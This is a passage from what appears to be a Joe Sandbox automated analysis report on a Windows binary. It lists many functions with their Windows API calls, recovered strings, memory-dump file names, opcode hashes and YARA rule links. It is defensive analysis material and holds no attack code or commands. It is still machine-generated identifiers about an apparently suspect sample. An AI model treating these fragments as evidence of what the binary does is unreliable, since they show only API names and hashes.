                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                          • String ID: |
                                                                                                                                                                                                                                          • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                          • Opcode ID: 4950a1097751821405f18feb08dac06e15ab70da3a1428f932043e37aeb00f76
                                                                                                                                                                                                                                          • Instruction ID: e3025e6e98bc70023649ebf9b813132bd4b3bc0939e23543d286eceb6e57e745
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4950a1097751821405f18feb08dac06e15ab70da3a1428f932043e37aeb00f76
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF312C75D00209ABCF15EFA4DC85AEE7FB9FF04300F00005AF915A6262DB31AA46DB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0016356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00163621
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0016365C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                          • Opcode ID: d95a9393b301470eda84a80780492cea6f968f809d91653e8d3f9b19e7469844
                                                                                                                                                                                                                                          • Instruction ID: 9bd5031ebb41d5b393561bbec0908a0b1a15a4959b6bbad2854060d5d6f5c5aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d95a9393b301470eda84a80780492cea6f968f809d91653e8d3f9b19e7469844
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61319C71100204AEEB109F68DC80EFB73A9FF88764F00961AF9A597290DB71ADA1D760
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00164537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0016461F
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00164634
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID: '
                                                                                                                                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                          • Opcode ID: c5bd822346b815e7f6ecc7a3544e6eba1b6a62d16370227f72d388ab63c5aff1
                                                                                                                                                                                                                                          • Instruction ID: bbda845c6c378138de1062fb67ba63d671eaaf52f37bdd6878067a9c93f35a07
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5bd822346b815e7f6ecc7a3544e6eba1b6a62d16370227f72d388ab63c5aff1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60312A74A0130AAFDF14CFA9C990BDA7BB5FF49300F14406AE905AB351D770A951CF90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001631EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0016327C
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00163287
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID: Combobox
                                                                                                                                                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                          • Opcode ID: fbb895e141b80363256de4a925083fd0f22fa5d334a46fd2765f879f3fae3c57
                                                                                                                                                                                                                                          • Instruction ID: 488cd0625b70c60f519f6610ece1aee924ce926380984a8cce7a5b891e78b076
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbb895e141b80363256de4a925083fd0f22fa5d334a46fd2765f879f3fae3c57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C11B2713002087FFF259E54DC90EFB3BAAEB953A4F104129F928972D0D7719D618760
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00163710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000D604C
                                                                                                                                                                                                                                            • Part of subcall function 000D600E: GetStockObject.GDI32(00000011), ref: 000D6060
                                                                                                                                                                                                                                            • Part of subcall function 000D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000D606A
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0016377A
                                                                                                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 00163794
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                          • Opcode ID: b5e11a5c5f688c66fd413a1f0ab6583e4765eacfcfde587fac03adb056236065
                                                                                                                                                                                                                                          • Instruction ID: b825c3020376c39e8e82f9c18954458be8fb66e95526fc1313e7bcb371ff6551
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5e11a5c5f688c66fd413a1f0ab6583e4765eacfcfde587fac03adb056236065
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41113AB2610209AFDF01DFA8CC45EFA7BB8FB09354F004515FD66E2250D775E8619B60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0014CD7D
                                                                                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0014CDA6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                                                                                                                                          • String ID: <local>
                                                                                                                                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                          • Opcode ID: 039fd44e96662738ac007910b00c7942bd1def16a36f11ff45d9952af395a44a
                                                                                                                                                                                                                                          • Instruction ID: 29b36c9c1b7ecadd15c71ab23d7dd4128c688d6cc66784b42befb37890ce21a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 039fd44e96662738ac007910b00c7942bd1def16a36f11ff45d9952af395a44a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11E571A06635BAD7784BA68C49FF7BEACEF127A4F00423AF159830A0D7709840D6F0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00163429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 001634AB
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001634BA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                          • Opcode ID: 5a9b5d90fd91e05927aa59b5362475416bb0db415ac85a2f874fa1cfeb955401
                                                                                                                                                                                                                                          • Instruction ID: 30721229e2c4bf0c26f39824c41169b1a41147b943e2c15e3634664bb731e8a1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a9b5d90fd91e05927aa59b5362475416bb0db415ac85a2f874fa1cfeb955401
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B116A71100208AAEB128E64DC84AFB7B6AEB15378F504324FA71931E0CB71DCA19B60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00136C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 00136CB6
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00136CC2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                          • String ID: STOP
                                                                                                                                                                                                                                          • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                          • Opcode ID: 61782330c675589d1487eb87066d52b546c326d47365c01d5e3147c9969d0333
                                                                                                                                                                                                                                          • Instruction ID: 58c4100b16f816a642792c9a2f5f75367546d738f6efb3c6a3c0f9a73a69488e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61782330c675589d1487eb87066d52b546c326d47365c01d5e3147c9969d0333
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1012632600526ABCB209FFDDC808BF73B5FB61714F014529E89297292EB31D800C750
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00131D4C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                          • Opcode ID: 24436ff10649205355d1098a83ce7f660ff45e2b92caf8342d97e65da578430d
                                                                                                                                                                                                                                          • Instruction ID: 07685f233d1dc3bdf0afa24aca2cb1141f71d8542a9bb0c799c2674f162282e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24436ff10649205355d1098a83ce7f660ff45e2b92caf8342d97e65da578430d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8701B171601218ABCB08EBA4DC558FE73A9EB57360F440A1AF872673C2EF3059088760
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00131C46
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                          • Opcode ID: d65359fff1450aa6c20dd417d21877e00a92c7f3f67c957a1553992e402005a8
                                                                                                                                                                                                                                          • Instruction ID: 451a38ce383dc935b6d09b5033a5fff71f5a009553d0a7b188f5c0745f6b1b07
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d65359fff1450aa6c20dd417d21877e00a92c7f3f67c957a1553992e402005a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E501A775781204B6DF08EBA1C9529FF77A99B11340F14101AF41677282EB609F0897B5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00131CC8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                          • Opcode ID: 7275983300c1876e75a0046ca7901baa13208591749c32b6e74cf2ea7eb5df61
                                                                                                                                                                                                                                          • Instruction ID: 319a1503bf9f2a806eb0db1eec6a65b9c4374a041c39ad0f23d4dc7bf9adc4aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7275983300c1876e75a0046ca7901baa13208591749c32b6e74cf2ea7eb5df61
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C01D67178021877DF04EBA0CA02AFE73A99B21340F541016B80273382EB609F09D671
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00131DD3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                          • Opcode ID: 7683a22e501aa569e55f20b9de891e9b0e925c523d3883f18e18c42ad535658f
                                                                                                                                                                                                                                          • Instruction ID: 9aef0498af87a29cd6c9c81c82eb1dd09e6ad2d78bfa75e6b6a6f7051d98215e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7683a22e501aa569e55f20b9de891e9b0e925c523d3883f18e18c42ad535658f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78F0AF71B5131876DB08E7E4DC56AFE77A8AF12750F44091AB822633C2EB605A0882B4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                                                                          • String ID: 3, 3, 16, 1
                                                                                                                                                                                                                                          • API String ID: 176396367-3042988571
                                                                                                                                                                                                                                          • Opcode ID: f9668d50f532d7f26057f1635cdab80442baf03dbc87ceb82586c05dcd700074
